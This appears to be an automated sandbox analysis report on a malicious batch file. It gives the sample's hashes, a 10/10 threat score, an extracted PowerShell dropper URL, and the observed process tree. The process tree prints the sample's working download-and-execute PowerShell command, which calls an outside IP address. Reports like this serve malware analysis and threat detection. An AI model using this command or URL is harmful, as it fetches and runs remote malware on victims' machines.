Analysis
-
max time kernel
130s -
max time network
68s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
15-05-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
d4a380d12c8f386aeaa2ab8a1f33067f.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
d4a380d12c8f386aeaa2ab8a1f33067f.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
d4a380d12c8f386aeaa2ab8a1f33067f.bat
-
Size
218B
-
MD5
67895090003d0e397d064545c799e1b7
-
SHA1
b1864fd30e1c39495ed72a9cdf4744446233cc4d
-
SHA256
3c3e7899e6b30a6296d9e7e6a4c25ac2bdd7aa646176afbea2c2dc5198c2874e
-
SHA512
3492801a8dda9940ad6fdc7d76d3bd876fa7bf0ed30a62b8113ae39f460eeb7d28ff3b1db77b8c9dc61880be1c2137c1c3e68be77f1f6101741e5054599458de
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2204 2028 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2204 WerFault.exe Token: SeBackupPrivilege 2204 WerFault.exe Token: SeDebugPrivilege 2204 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d4a380d12c8f386aeaa2ab8a1f33067f.bat"1⤵PID:3788
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f');Invoke-YRZYGKQZCZH;Start-Sleep -s 10000"2⤵PID:2028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2204